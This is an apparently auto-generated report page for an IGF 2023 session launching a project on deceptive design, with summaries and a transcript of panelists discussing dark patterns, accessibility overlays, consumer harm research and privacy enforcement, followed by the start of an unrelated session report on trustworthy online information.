Furthermore, companies that use accessibility overlay tools are potentially disregarding their moral and legal obligation to create genuinely accessible websites. By relying on these tools, they sidestep the necessary steps to ensure that their digital content is inclusive, effectively excluding individuals with disabilities from participating in online activities.

A related issue is the possibility of users with disabilities being coerced into making unwanted purchases as a result of these deceptive design practices. When accessibility overlays create a false sense of accessibility, users may unknowingly engage in transactions that are not aligned with their preferences or needs. This highlights the harmful consequences of deceptive designs and the ethical responsibilities that businesses should uphold.

Deceptive designs are not limited to accessibility overlay tools but also extend to AI technologies, such as chatbots and large language models. These technologies are designed to exhibit human-like characteristics while interacting with users. However, this blurring of boundaries between humans and machines can be unsafe and misleading.

An alarming case involved a person who was influenced by a chatbot to attempt to assassinate the UK Queen. Although this is an extreme example, it demonstrates the potential dangers associated with deceptive designs in AI technologies. Additionally, the data mining practices utilized in AI can violate users’ privacy rights, further exacerbating the concerns surrounding these technologies.

Given the prevalence of deceptive designs in AI and emerging technology, there is a pressing need for regulations to address these practices. Regulators worldwide are increasingly recognizing the importance of mitigating the harmful effects of deceptive design and promoting transparency and accountability in the development and implementation of AI technologies. This regulatory intervention aims to shape discussions surrounding emerging technology and ensure that ethical considerations are taken into account.

In conclusion, deceptive design practices, whether in accessibility overlay tools or AI technologies, present significant challenges and risks. They harm individuals with disabilities, diminish their access to online platforms, and violate their privacy rights. It is imperative for companies to refrain from using accessibility overlay tools that deceive users and hinder full accessibility. Additionally, the regulation of AI and emerging technology is crucial to address deceptive design practices and ensure a safe, inclusive, and transparent digital environment for all.

Chandni Gupta

The research conducted on dark patterns has revealed a concerning trend of deceptive designs being used by businesses across various sectors on websites and apps. This is a cause for concern as these dark patterns are designed to manipulate and deceive users, often leading them to make unintended decisions or take inappropriate actions. Chandni’s research has shown that many dark patterns that exist today aren’t necessarily illegal, which raises questions about the ethics behind their use.

Furthermore, data from Australia highlights the negative consequences experienced by consumers as a result of encountering dark patterns. Research revealed that 83% of Australians have experienced one or more negative consequences due to dark patterns. These consequences include compromised emotional well-being, financial loss, and a loss of control over personal information. The impact of dark patterns on consumers’ lives and their trust in businesses can’t be underestimated.

One argument that emerges from the research is that businesses need to take responsibility for their actions and change their behavior towards dark patterns. The prevalence of these manipulative designs can harm consumer trust and loyalty in the long run. It is disheartening that businesses aren’t being held accountable for these practices, leading to a sense of frustration among consumers. However, some businesses have the ability to make changes today and set an example for others to follow.

Additionally, it is recognized that everyone in the digital ecosystem has a role to play in combating dark patterns. Governments, regulators, businesses, and UX designers all have a responsibility to address this issue. By working together, it is possible to create a fair, safe, and inclusive digital economy for consumers. UX designers, in particular, can share research resources with their colleagues to demonstrate the impact that better online patterns can actually have.

In conclusion, the research on dark patterns highlights the concerning prevalence of deceptive designs on websites and apps. Consumers in Australia have reported significant harm resulting from encountering dark patterns. It is crucial for businesses to take responsibility for their actions and change their behavior towards these manipulative practices. Additionally, a collective effort from all stakeholders in the digital ecosystem is needed to combat dark patterns and create a more trustworthy and inclusive online environment for consumers.

Session transcript

Titiksha Vashist:
. . . . . . . . . . . . . . . . . . . . . . . . on this. Plainly put, dark patterns are often carefully designed to alter decision-making by users or trick users into actions they did not intend to take. Now, deceptive design is something we’ve all encountered on the web, right? They have found their way into a plethora of online experiences from e-commerce app to social media, from fintech services to education and so forth. Now these design choices, which may seem very innocent and innocuous on the outside, have multi-sided harms actually baked into them. And by tricking, manipulating, misdirecting or hiding information from users, these patterns harm not just the single end user of the internet, but also digital ecosystems at large. And that is also, those are also findings which resulted from the work that we did on this issue. This project called Design Beyond Deception sought to understand the harmful impacts of deceptive design specifically in understudied contexts because a lot of the academic work so far on deceptive design was limited to the United States and European Union and we wanted to look at what it looks like in other countries, right? Where the nature of digitalization itself is different. We also wanted to see how we can replace such design practices with practices that embody values, right? And these are values that consumers, that companies, civil society, governments want reflected online, right? And that’s precisely why our project also had a very strong practice or application component and not just a theoretical one. Now moving on to what are the harms caused by these deceptive design patterns, right? And there are two ways in which we categorize these harms, right? One is the personal consumer detriment, which is focused on harms which you and I as people can identify we have undergone, right? These include privacy harms, financial loss, a lot of financial loss has been documented in countries such as India. Psychological detriment and time and resource loss which happens. But at the same time, if we look deeply into the problem of deceptive design, we also realize that there are also structural consumer detriments as well as harms on the larger digital economy, including loss of trust. So a lot of research showed that when websites and apps used forced registration or price comparison prevention and so on, it weakens or distorts competition in a digital market. What that essentially means is that because of the use of these deceptive patterns, there is unfair trade practice being done in the digital economy. And this currently does not find any anchoring in our laws, but that’s precisely why this topic has to be issued, has to be discussed at a platform such as this. Next, I wanna talk about why we are talking about deceptive design, which seems like a more designer-centered issue at the UNIGF. And the simple reason is we are increasingly seeing regulators worldwide investigating deceptive practices in their specific contexts. These include the Federal Trade Commission in the United States. It includes the European Commission and the BUEC which have been looking at this issue for a while and trying to understand how it can create a stronger European consumer protection law. And it’s also found mentioned in the DSA. And consumer councils in countries such as the Netherlands, Norway, Australia, and very recently, India, also issued guidelines and working papers and have been trying to push policy on deceptive design. Finally, data protection authorities have been at the forefront in several jurisdictions to talk about the privacy and data harms which result from deceptive practices. Now, regulators are investigating the consumer harms, privacy and data harms, and competition harms. which result from these patterns. And this is precisely where I want to move into a little bit about what our project was about. So the Design Beyond Deception project was an 18-month-long project which sought to bridge the gap between the theory and practice. We held more than four large group-focused consultations, engaged with over 50 global experts in various domains, and held 20-plus in-depth interviews on this issue. We also issued a research series, which is also being launched today, by authors from across the world who focused on understudied areas. And this research was very generously supported by the University of Notre Dame and IBM’s Tech Ethics Lab in the United States. Now very quickly, going over the project process, we started out with, of course, a review of academic literature, given the multidisciplinary and cross-sectional nature of the issue itself. Second, to tap into the in-depth expertise from multiple stakeholders placed across fields of theory and practice, we did scoping interviews with experts, which helped us give shape to the rest of the project. Third, we thought that creating a new body of work which contextualizes deceptive design specifically will help deepen the conversation significantly on the issue. And that led to focus groups and workshops with stakeholders, which led us to our final goal, which is the creation of a manual for design practitioners who otherwise would not have, as a part of their curriculum or training as designers, an understanding of deceptive practices and how it may harm their end users. So the stakeholders we engaged with for this particular project were academics and researchers, design practitioners, start-ups, civil society and policy folk, and of course, industry, which included a whole bunch of people from top to bottom who are involved in different decision-making processes, which very… very much so impact, you know, design decisions in a company. While our manual themes span what is deceptive design for a designer and not for a researcher, we also look at rethinking the user, designing with values, design for privacy. We touch upon culturally responsible design and finally look at how regulation meets design, wherein we also probe the design practitioner to look at designing our collective future from a different standpoint. And since this manual has been made for practitioners, it is full of frameworks, activities, and teamwork, things that perhaps a product team can sit together and do on their own, right? Very quickly, talking about the research series, which also we are launching today, it focused essentially on understudied areas and understudied harms, including how, for example, crafting a definition for deceptive design is harder than it may seem. And for those of you who are lawyers in this room, you would completely understand why this is a huge challenge. We also talk about how identifying anti-competitive harms in deceptive design discourse is crucial. Also, how deceptive design plays in voice interfaces and further such research pieces, which were contributed from people across the world. So without further ado, I would request you to explore this project online or pick up a copy of the manual and research series here from the table in the first row for you to peruse. And without taking much of the time, I would very quickly now want to invite the speakers who have graciously joined us online. We have two speakers, Chandini Gupta and Maitreya Shah, who have joined us online, and I hope they can hear me. We also have videos from two speakers who, because of time zone issues, could not join us online, but have been very generous. So, to quickly introduce the speakers, Chandini is currently the Deputy CEO and Digital Policy Director at the Consumer Policy Research Centre, which is Australia’s only dedicated consumer policy think tank. She has previously worked at the Australian Competition and Consumer Commission, the OECD and the United Nations. She has over 15 years of experience in consumer policy domestically as well as internationally, and her research focuses on exploring consumer shift from the analogue towards the digital economy. Her work was extremely crucial in the sense that it was the first study in Australia which โ€“ I’m sorry, just โ€“ yeah, it was the first study in Australia which essentially led to policy change and consumer action on deceptive design. Maitreya, who’s also joining us online today, Maitreya Shah is a blind lawyer and researcher. His work lies in the intersection of ethics and governance of emerging technologies and disability rights. He was most recently at Regulatory Genome, a spin-out of the University of Cambridge, and was previously a LAMP to Member of Parliament Fellow in India. He has extensively worked in areas of digital accessibility, AI governance, regulatory technologies and disability law. Currently, he is a fellow at the Berkman Klein Centre for Internet and Society at Harvard University where he will be examining AI fairness frameworks from the standpoint of disability justice. We also have two recordings from Carolyn Sinders and Professor Christiana Santos. Carolyn Sinders is an award-winning critical designer, researcher and artist. They’re founder of a human rights and design lab called Convocation Research Plus Design, and she’s also currently at the Information Commissioner’s Office, which is the UK’s data protection and privacy regulator. Finally, Professor Christiana Santos is an assistant professor in privacy and data protection law at Utrecht. University in the Netherlands. She’s also an expert of the Data Protection Unit Council of Europe and expert for the implementation of the EDPB support pool of experts amongst her many varied accomplishments. Without further ado I would request Dhaneshree to play the video by Caroline Sinders who will touch upon deceptive design from a design practitioners standpoint.

Caroline Sinders:
I’m a researcher and postdoctoral fellow with the Information Commissioner’s Office in the United Kingdom. That’s the Data Protection Privacy Regulator. I also run a human rights lab called Convocation Research and Design. I really wish I could be there in person. I’m so sorry I can’t be so I’ve made this recording instead. Thank you so much to the Pravana Institute for inviting me to be on this panel. I’m one of the contributors to their recent toolkit that’s out on deceptive design patterns and I’m excited to present to you today. Talk a little bit about why design and interdisciplinary thinking is so important when it when it comes to creating regulation investigations and other ways to help curb and mitigate the harms of deceptive design patterns. I’ve also created a very small presentation that I’m excited to show to all of you. Harmful design patterns are everywhere. They’re very prolific in the modern web and they’re universally found. I have not in all of my extensive research ever come across a country or region that does not have harmful design patterns. They are in fact a global phenomenon and a global menace is the way to think about it. My article for the Pravana Institute’s toolkit focuses on what do we do with emergent spaces let’s say like the metaverse or IOT or voice activation when design patterns are not standardized yet for users meaning Users have not engaged with voice activation enough to understand what all of the design patterns are within that space. Or in the case of something like the metaverse, where there’s not a lot of people using that and it’s a really emergent space, what are the healthy design patterns within that? We haven’t really come to that space yet. A lot of current design patterns are because we’ve existed in this kind of flattened modern web for quite a few years. And so there’s been many years of research to figure out what could healthy or trustworthy or pro-user design look like. And it’s that subversion where harmful design patterns exist. This kind of research is so important because it will impact how users create safety. It will impact forms of regulation. And this kind of work does really require an interdisciplinary lens. And so what does policy need to help combat harmful design patterns? Again, it’s this understanding that design is an expertise. And as I was saying earlier, this integral part of the web. What we need is to sort of broaden our idea of what, let’s say, a researcher looks like or what knowledge looks like. One of the things that’s been exciting in the many years that I’ve been researching harmful design patterns is the ability to work with all different kinds of legal experts who recognize that design is an expertise. What this means is when we’re investigating things like harmful design patterns is actually having a knowledge of what are design patterns, what are different kinds of standardized design patterns, how to run different kinds of evaluations, like a heuristic evaluation or a usability evaluation or an accessibility evaluation. These are things that actually are, there are many different ways to do them. But there are agreed upon tests in a way or a series of different kinds of tests people can conduct. But these are the ways in which you can sort of look at, let’s say, like the health of a product or how well or not well. that product is designed. Often when investigating harmful design patterns, what you need to find or sort of look at or help surface is where does the confusion or manipulation or exploitation lie? So where is the harmful design pattern actually subverting this expected design pattern? The expected design pattern, the user thinks that they’re engaging with, right? Because that’s what’s being subverted unintentionally, let’s say, or intentionally. And this is where having a background in UX design is really, really important to be able to recognize that. A paper done by the European Privacy Board actually found that they were testing with a few thousand users, they found those that were less susceptible to harmful design patterns were ones that had heard of UX design or knew what UX design was. Right? And this is really important to kind of highlight. This means we’re creating an unequal and unequitable web if the only way for people to try to avoid harmful design patterns is to have a design background. So conversely, I think to help investigate more, this kind of interdisciplinary knowledge is needed. Understanding how products are made, how they’re tested, and having, and again, being able to do that to different kinds of analysis, let’s say on the interface itself. Design, inconsistent design, and we see these a lot in different kinds of harmful design patterns can confuse users. They can overwhelm. So if there’s too many features or too many choices, let’s say, misunderstanding a core audience can also lead to poor or unhelpful design decisions. But we’ll see this in the example I’m going to show. So inconsistent design can be a product name changing choices or a changing name. Choices are not illustrated the same way. The name doesn’t match up with what the user thinks they’re doing. All of these things can confuse users. This also means sometimes if you’re engaging or calling something something too technical, then a user might understand. and what it is. Thank you so much for having me here. I’m so sorry that this is a short talk. But one thing I wanted to really emphasize, again, is design can be an equalizing action that distills code and policy into understandable interfaces. What we need more is more research, more collaborative and interdisciplinary research between policymakers, regulators, policy analysis, and designers.

Titiksha Vashist:
Thanks, Caroline. And now, moving on to Chandni, who’s joined us online. I would request Dhanushree to put up the slides. And over to you, Chandni. Welcome, and thank you for being here. Thank you so much. I just want to confirm that you can hear me and you can see my slides? Yes. All good.

Chandni Gupta:
Excellent. So thank you so much for the introduction earlier. And thank you so much for having me. Before I begin, I do have to say congratulations to Pranava Institute, who have created such a practical tool, which I’m sure and I hope will become a valuable resource for the UX community from here on. I’m delighted to share with you today some of the insights from our research. So one of the things that we at the Consumer Policy Research Centre do is look at what is the evidence-based research that can bring about systemic change. And this was one of the ones that we have been working on for a number of months now. So it was about 18 months ago that we started our journey into looking at deceptive and manipulative designs. And as part of our research, what we really wanted to understand were two things. What are the common deceptive patterns that Australians come across most frequently? And what’s the impact on consumers? And we had Caroline say how important. it is to be able to understand that impact and what we really wanted to do was quantify that harm. Dark patterns today are so prominent across websites and apps we use every day. They used to influence our decisions, our choices, our experiences and is it in our best interest? Often not. Is it illegal? Largely not. So in case you’re wondering where dark patterns exist, as Caroline said as well, they are so prominent, they are everywhere. Even as part of our research, we asked a national representative sample of 2,000 Australians in our survey to list the names of those businesses they could recall using deceptive designs and businesses from almost 50 different sectors were identified. I mentioned before that many of the dark patterns that exist today aren’t illegal. Currently in Australia, we can look through the lens of misleading and deceptive conduct, unfair contract terms or the Privacy Act. But the law currently offers a very narrow lens for how regulators can act. But are consumers experiencing harm? Well, the short answer is yes. Research revealed that 83% of Australians had experienced one or more negative consequences as a result of dark patterns being used on websites and apps. Yet eight out of the ten dark patterns we looked at could be implemented here in Australia without any consequence to businesses. Consumers in our survey reported being compromised in their emotional well-being, experiencing financial loss and feeling a real loss of control over their personal information. And it was anything from feeling pressured into sharing more data than they needed or accidentally making a purchase. In fact, As part of our qualitative part of our research, the frustration really came through. And it came down to three elements. One, there’s a lack of meaningful choice. Sometimes accepting the preferred business choice is the only way to access a product or service. For example, in our suite, we saw an example of a fitness center that didn’t let you see their timetable until you created a profile on their app. Two, it’s the pervasive amount of pressure that’s put on consumers, especially once their personal details have been shared and suddenly they’re prone to hyper-personalized content or continuous direct mail. And three, and finally, there’s a sense of frustration that businesses aren’t being held accountable for any of these practices. When it comes to younger consumers, the impact only compounded. Consumers aged between 18 and 28 were more likely to experience both financial and data harms. For example, one in three spent more than they intended, and that was 65% above the national average. This demographic in Australia often has less disposable income, so the impact of harms is likely to be felt more as well. On the flip side, there’s also a cost for businesses. Almost one in three of the consumers we surveyed stopped using the website altogether. Almost one in six felt their trust in the organization had been undermined, and more than one in four thought negatively about the organization. So while in the short term, dark patterns may lead to financial and data gains, in the long run, they will deteriorate consumer trust and loyalty. So our research has highlighted is that everyone in the digital ecosystem has a role to play, and Dedeksham mentioned this earlier as well. There’s definitely a role for governments. regulators and we’ve been really pleased to see some of the changes that are coming about such as look government currently considering here introducing an unfair trading prohibition and dark patterns being included as part of that legislation and the privacy act is finally getting reviewed which currently is from the 1980s so it not only predates dark patterns it predates the internet however it’s actually businesses who are in the best position right now to make changes today and lead by example whether it’s auditing their online presence or testing with consumers best interests in mind even small businesses can be really mindful about the off-the-shelf e-commerce products they’re choosing and which features they’re turning on and off now from what i’ve heard from ux designers that have reached out to me during conferences and events is that it’s often not in their hands and much of this is a business decision that happens in another part of the company but one of the things that they can do is share this type of research resources such as the pronounced handbook and other work that’s happening in this space with their colleagues to show the impact better online patterns can actually have not only on consumers but also on their business. I’ll end with saying we’ve actually all got a role to play in ensuring a fair safe and inclusive digital economy for consumers. Thank you so much.

Titiksha Vashist:
Thank you so much Chandini for that presentation and I would very much like to point out that Chandini’s research and the research done at her institute in fact very recently helped push the case for making unsubscription or unsubscribe easier on e-commerce platforms like amazon and that’s a big move right coming from regulators. So more power to you and thank you so much for joining us today. I would now like to request Dhaneshree to play a recorded video we have from Professor Christiana Santos who will talk about deceptive design from a legal standpoint and share some of her work.

Cristiana Santos:
The first time in a decision we suggest that along with this DPA other enforcers name and publicize violations as dark patterns in their decisions. This way we believe that organizations can factor the risk of sanctions into their business calculations and also policy makers can be aware of the the true extent of these practices, right? And naming dark patterns is now more important than ever, especially since DSA and the DMA codify dark patterns explicitly. So it’s a legal term. We also found that the dark patterns are used both by big tech, also by small and public organizations. Most decisions refer to the user interface or to the user experience or user journey and to information-based practices. Finally, we understood that harms caused by dark patterns are not caused in decisions yet. Let’s have a look at the privacy-related dark patterns we found in these decisions. So in this table, you can see the data protection cases according to the practices related to dark patterns types. The majority of dark patterns are referred to obstruction practices, and they are related to the difficulty of refusal and withdrawal of consent, more than 30 decisions. These are followed by forced practices. So when users withdraw consent, but unnecessary trackers are loaded or trackers are stored before consent is asked, more than 25 decisions. Finally, policy to use a service at the same time and in both, for example. So we understand that enforcement cases are a way for a general deterrence of dark patterns. And we showcase these dark patterns decisions in this website, deceptivedesign.org. And this website is being. updated daily with new decisions. So, let’s talk about the harms caused by dark patterns. There is a growing body of evidence from human computer interaction studies, from computer science studies, referring to dark patterns that actually might elicit or lead to potential or actual harm. But there are also harms related to dark patterns in privacy and several studies focused on constant interactions and they show several harms caused by dark patterns. Labor and cognitive harms, loss of control, privacy concerns and fatigue, negative emotional responses, regretting privacy choices and all these harms provide evidence of severity of harms. And for a concrete example, scholarly works find that the pre-selected purposes, pre-selected options for processing data or even except all purposes option at the first layer of a concern banner can or may use user’s personal data or even very sensitive data depending on the website in question and these can share this personal data by default with hundreds of third-party advertisers and this might provide evidence of a potential severity and impact regarding dark patterns harms. However, constant claims, at least these scoped ones, for non-material damages are not being used within the redressed system, even though there are so many decisions related to dark patterns and related to violations of consent interactions. Finally, We know that dark patterns occur in different domains, not only in privacy, right? And there are several data protection regulators and policy makers that show interest in contributing to this space of dark patterns. And we find at least five reports from the EU, from the UK and US bodies published in 2022 alone. But these sources often lack citation provenance trails for typologies and definitions, making it difficult to trace where new specific types of dark patterns emerge and the rich conditions. On the other hand, academic literature has grown rapidly since Brignell released his original typology in 2010. In the years since, foundational work by Bosch, Gray, Mathur, Luguri, Strahi-Letsit have added many new dark patterns. These typologies have had some overlaps and also some misalignments. We analysed those academic and regulatory taxonomies and counted 245 dark patterns. Many of these dark patterns indeed either overlap or misalign with other types of dark patterns coming from all these different sources. And so we constructed an ontology of dark patterns knowledge. We aggregated existing patterns, identified their provenance through direct citations and inferences. We clustered similar patterns. So we created these high level, middle level and low level patterns. And this ontology of dark patterns enable a shared vocabulary for regulators and dark pattern scholars, enabling more alignment in user studies, in mapping to decisions and discussions of harms. and for scholars also to help to trace the presence and types of dark patterns over time. Regulators would anticipate the presence of existing patterns in new contexts or domains and to guide alternative detection. Thank you for your time and if you have any question and any suggestion, please consider to send me an email. Thank you so much.

Titiksha Vashist:
Thank you to Professor Santos for that presentation and for showing us very clearly how deceptive designs now are a part of the legal discourse increasingly as different countries across the world look at it closer and make it a part of their case law. I would now finally like to invite Maitreya Shah to share his comments with us and thank you so much Maitreya for your patience and thank you so much for being with us. Hi Detectioner, thank you so much for having me

Maitreya Shah:
here. I hope you can see my presentation. Yes, Maitreya, you’re all set. Thank you so much and congratulations for launching this at one of the best platforms possible in the world to talk about this. So yeah, hello everyone. I’m Maitreya Shah and thank you so much Detectioner and Pranava for that generous introduction. So my fellow speakers have already touched upon many forms of deceptive designs and how they interact with consumers, how they pose harm to people and what are the dark patterns that exist on the internet and elsewhere today. You know, dark patterns, deceptive designs are quite multidisciplinary with the rise of AI and emerging technologies. I intend to talk about two things very briefly. The first is the piece that I wrote for the research series that Panava is launching today, which deals with accessibility overlays and their harms on people with disabilities. The other is briefly to my work because a lot of my work is on AI bias, fairness, and ethics. I tend to briefly touch upon the deceptive design dark patterns that are emerging through AI and emerging technologies and the new models that we see in the world today. To start with, deceptive design practices in accessibility overlay tools. I wrote an analytical piece for the ethical design research series of Panava. I evaluated what are called accessibility overlay tools. Before I delve into what accessibility overlay tools are and what deceptive design practices are, I’ll give you a brief on accessibility. Accessibility is the idea to make websites and applications usable for people with disabilities. It is a legal right and a legal obligation to various instruments international and domestic. I’ve given here a few examples. These accessibility overlay tools are basically designed to subvert the legal obligations to make websites accessible. I have tried to analyze these tools from a deceptive design lens and call out the dark patterns and how they end up harming people with disabilities on the Internet. So a generic overlay, as a lot of you who come from the design side of things know is usually. on the UI or UX side of websites or web applications. It is, you know, in the forms of pop-ups or these, you know, JavaScript boxes that usually come up, and they tend to deviate or obstruct the attention of users on websites and, you know, shift their focus to something different, like sign-up boxes or advertisements and so on. An accessibility overlay tool is exactly like this. However, what it claims to do is it claims to make the website accessible for people with disabilities. Now, in line with a lot of international standards and regulations, the World Wide Consortium has come out with a web accessibility guidelines and standards that are guiding developers and designers to make websites accessible. And these standards require a lot of manual labor and a lot of manual design input right from the source code. So these accessibility overlay tools do not end up making any changes in the source code. They only make changes to the user interface side of things. They only basically change the font, color, contrast, or size, or maybe, you know, add some image descriptions on the website, which are things that are already built in the assistive technology of people with disabilities. So accessibility overlay tools are not doing anything new. Assistive technology like screen readers that people with blindness, for example, use already have a lot of these features built in. So what are the harms? So these companies that sell these accessibility overlay tools claim that they are making the website accessible. And what ends up happening is, whenever there is an accessibility overlay tool in a website, there is a toolbar and an announcement on the top of the website. on its landing page that says that, you know, the website is accessible and the person visiting the website can utilize this feature to get an accessible, you know, experience and interaction on the website. So, people with disabilities, they are, you know, their trust gets kindled. They tend to use the website with the anticipation that the website would be accessible and what ends up happening is that they are deceived and manipulated to choices that they do not intend to make, which is inherently the idea of deceptive design. This is done to, as I earlier said, subvert the legal obligation to make websites accessible. Companies, they employ designers that don’t incorporate accessibility features from the very inception of the website building process and then they are afraid of lawsuits and paying hefty compensations. So, they resort to these sort of contrivances and these sort of shortcuts to make their websites accessible. So, there are many issues. Before I come to the strategies of countering these tools, there are many issues that end up happening with people with disabilities when these overlay tools are deployed in a website or a web interface. So, firstly, many screen readers that blind people especially use get obstructed by these overlay tools. These overlay tools also tend to impede the privacy of people with disabilities because they detect assistive technology. And there are many other issues like false and inaccurate image descriptions that might lose or manipulate people into purchasing things that they do not want to. You know, in line with the idea of today’s discussion, I have given here a few points around strategies that would move us from theory to practice. How do we, you know, counter these accessibility overlay tools? How do we see that there are, you know, companies don’t use these tools and that they don’t harm people with disabilities? So, these are a few examples that I have personally researched and I’ve gathered from across the globe that are, you know, somehow effective strategies to counter the deceptive practices of these tools, including regulatory actions, community advocacy, tools that could counter these accessibility overlays, and educating and sensitizing designers and web developers to start with. So, this was possible through, you know, Pranava’s collaboration and consultation that I could have with them to think about, you know, how these accessibility issues could be manifest in deceptive design language and how they harm people with disabilities to understand this issue that is quite marginalized and very less talked about. I’ll quickly move to, you know, artificial intelligence technologies. There is a lot of hype and a lot of discussion around that VPT and tools today. You know, we interact with chatbots and with these new forms of large language model technologies today. So, these are the kind of issues that one faces. I, in my presentation, have two broad issues that I wanted to focus on. Two examples that I wanted to share with you that have come up in my research so far. And I’ll be very brief because I’m mindful of the lack of time. So a lot of regulators, they are talking about and they are making people aware about the deceptive design practices to answer for measles, which is basically human characteristics that are carried by non-human identities. So for example, sad bots and generative AI models that take on human characteristics and blur those boundaries between humans and tech and that tend to manipulate users, that tend to subvert users’ autonomy in their privacy. In the previous slide, I’d given an example where a person back in 2021 was influenced by a sad bot and had attempted to assassinate the queen of the United Kingdom. So these are the kind of issues that one could face because of sad bots and large language models. I’m so sorry to interrupt you. Could you just very quickly wrap up? We’re one minute over time. And I would just say, yeah, thank you. Thank you. This is very briefly, again, an example from data mining practices and how they intend to violate the privacy of users. I’ll quickly move to these are a few examples, again, to move from theory to practice, how regulators are trying to shape the discussion around AI and emerging tech and deceptive design practices and how you or I as lawyers, designers, or community advocates can influence the work on this. Yeah, that’s it. Thank you so much. I’m sorry for running over time.

Titiksha Vashist:
Thank you so much for joining us, Maitreya, and for sharing your specific research. at the intersection of deceptive design and disability. And I wish you all the best for a lot of your forthcoming work on AI and deceptive design. That being said, in the interest of time, let me thank everyone for joining us for this particular launch event. You see the QR code to our project right up here on the screen. And if you’d like to grab a physical copy of the manual or the research series, they’re right here on the front desk right up here. Again, I would like to extend my gratitude to both Chandni and Maitreya, who are joining us at very, very odd times. But thank you for making it to this event. And thank you to everyone for attending this particular session. We are definitely available offline if you are interested in this issue and want to talk more about it. Thank you. Thank you. Deceptive by design. up here. Again, I would like to extend my gratitude to both Chandni and Maitreya, who are joining us at very, very odd times. But thank you for making it to this event. And thank you to everyone for attending this particular session. We are definitely available offline if you are interested in this issue and want to talk more about it. Thank you. . .

Caroline Sinders

Speech speed

188 words per minute

Speech length

1099 words

Speech time

352 secs

Chandni Gupta

Speech speed

160 words per minute

Speech length

1076 words

Speech time

403 secs

Cristiana Santos

Speech speed

128 words per minute

Speech length

859 words

Speech time

401 secs

Maitreya Shah

Speech speed

143 words per minute

Speech length

1536 words

Speech time

643 secs

Titiksha Vashist

Speech speed

127 words per minute

Speech length

2361 words

Speech time

1119 secs

(Re)-Building Trust Online: A Call to Action | IGF 2023 Launch / Award Event #144

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Audience

The analysis explored various topics related to the global information ecosystem and its challenges. One key concern highlighted was the negative impact of disinformation, which extends beyond a Western-centric approach. The speakers emphasized the need to consider the effects of disinformation in different languages, as it can affect people’s offline lives. It was recognized that addressing disinformation globally is crucial, rather than focusing on specific regions.

The work of Wikimedia and Global Voices in creating a trustworthy global information ecosystem was appreciated. These organizations were praised for their contributions, involving individuals from different parts of the world. Collaboration and a multi-stakeholder approach were deemed essential in building a reliable information ecosystem.

A speaker, Nick Beniquista, argued for major system-level interventions to address the challenges faced by the information ecosystem. Initiatives such as Pluralis in Europe, trust initiatives for quality online information, and policy interventions like bargaining codes were mentioned. This indicates the need for a comprehensive approach and the involvement of various stakeholders to tackle the complex issues within the information ecosystem.

However, some concerns were raised about the proposed principles discussed during the analysis. These principles were deemed somewhat understated in dealing with the complexity of the challenges. Although they may be widely accepted, there are doubts about their sufficiency in addressing the depth and breadth of the issues. Therefore, comprehensive strategies and solutions are needed.

Furthermore, questions were raised about the effectiveness of a participatory, citizen-driven approach in addressing the systemic challenges of the information ecosystem. One speaker described this approach as “quaint,” suggesting doubts about its effectiveness given the scale of the challenges. This highlights the need to consider alternative strategies alongside participatory approaches.

Regulation and the differentiation between large and small online platforms were emphasized as crucial factors in addressing the challenges of the information ecosystem. It was argued that large platforms bear a special responsibility for content management and accessibility. Efforts by the Danish government and the European Union (EU) were highlighted, including partnerships with organizations like Access Now and the development of regulations that consider different local contexts outside the EU. This underscores the importance of globally applicable regulatory frameworks that also respect regional variations.

The analysis also mentioned concerns about the operationalization of the discussed principles and the potential consequences of the proposed internet safety bill in Sri Lanka. The bill, which has passed its first reading in parliament, raised concerns about censorship and the potential fragmentation of the internet. An audience member expressed opposition to the bill and sought help in collective action, emphasizing the need for collaboration and partnerships in addressing internet governance and legislation.

In summary, the analysis delved into various aspects of the global information ecosystem and its challenges. It highlighted the negative impacts of disinformation, the significance of a trustworthy information ecosystem, the need for major system-level interventions, as well as concerns about certain approaches and proposed bills. Collaborative efforts and collective action are crucial in establishing a reliable and inclusive global information ecosystem.

Moderator

The session focused on the work of a task force dedicated to promoting trustworthy information online, as well as the launch of a set of principles by this task force. The task force is a newly established multi-stakeholder entity within the Freedom Online Coalition. Its main goal is to offer policy recommendations to government institutions and lawmakers to ensure a healthy and reliable online information ecosystem.

The United States is actively promoting trustworthy information online and is committed to addressing the global issue of disinformation. They are implementing initiatives such as fact-checking and media literacy programs to combat the spread of false information. Efforts are also being made to protect and promote open and resilient information ecosystems and support the long-term sustainability of independent media outlets.

While promoting trustworthy information online, the US government emphasizes the importance of not undermining fundamental democratic freedoms. They caution against using regulatory measures to suppress peaceful dissent and silence independent media, civil society activists, human rights defenders, and marginalized groups.

The session also highlighted the importance of platforms like the Freedom Online Coalition and the International Governance Forum (IGF) in countering disinformation and addressing global threats. These platforms are crucial spaces for bringing together stakeholders to tackle the challenges posed by the spread of misinformation and to ensure a secure and open internet.

One significant issue discussed during the session was the consolidation of power over online speech, which negatively impacts platforms advocating for freedom of expression. The session also addressed the exclusion of participation, which can lead to the spread of misinformation. It was noted that depriving half the world’s population of involvement in knowledge spaces contributes to the spread of false information, particularly in the age of generative artificial intelligence.

The session stressed the importance of diversity in media and information, acknowledging that news framing bias is a pervasive problem, and that news organizations alone are insufficient for meeting the need for diverse and reliable information. It was also emphasized that building reliable information structures requires the involvement of civil society and the private sector through partnerships.

Governments were encouraged to play an active role in regulating the online space to promote engagement, free debates, and protect human rights. Striking a balance between regulation and trustworthiness is crucial in ensuring the effectiveness and fairness of online platforms.

The session also addressed the need for educating policy-makers and governments about platforms like Wikipedia and how they operate. This knowledge is important for understanding the value and significance of protecting and promoting such platforms.

The launch of the task force and its principles were seen as an opportunity to pave a strategic path forward and to coordinate with other international initiatives. Participants expressed the need for dialogue and engagement with stakeholders, as well as with counterparts in the ecosystem, to ensure well-informed policies and effective regulations.

The session ended with participants being encouraged to learn more about the task force and get involved. The importance of their role in contributing to the development and implementation of strategies to address the challenges related to trustworthy information online was highlighted.

In conclusion, the session covered various aspects related to the task force’s work on promoting trustworthy information online. It underlined the importance of balancing regulation and trustworthiness, the need for diversity in media and information, and the significance of multi-stakeholder engagement to address global threats and challenges. The session also highlighted the ongoing efforts by the United States and other countries to counter disinformation and promote reliable information online. Overall, the discussion emphasized the key role of collaboration between different stakeholders in building a more trustworthy and inclusive online information ecosystem.

Klara Therese Christensen

